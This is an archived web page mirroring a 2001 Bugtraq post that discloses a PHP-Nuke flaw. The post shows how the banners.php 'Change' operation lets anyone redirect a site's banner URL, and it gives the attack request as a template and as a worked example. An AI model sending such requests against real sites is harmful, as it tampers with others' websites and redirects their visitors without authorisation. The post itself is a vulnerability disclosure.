The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version
Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке.
SOFT - Unix Software catalog
LINKS - Unix resources		 TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Php-nuke exploit...


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Mon, 2 Apr 2001 16:18:53 -0500
From: Juan Diego <diego@LINUXCOLOMBIA.COM.CO>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Php-nuke exploit...

Hi people...

This went public today... there are a bug in the banner section of
php-nuke (http://www.phpnuke.org) which is web engine...

the problem is you can change the url banners form anywhere, to anywhere

example, to change the url of the first banner yo should enter un your
browser


http://target/banners.php?op=Change&bid=bannerid&url=http://where.to

if we want to change the banner number 1 to redir to www.you_are_redir we
write

http://www.foo.com/banners.php?op=Change&bid=1&url=http://you.are.redir

where www.foo.com is the server running php-nuke,

thats it...



Bye

Juan Diego

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки 		Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network. RB2 Network.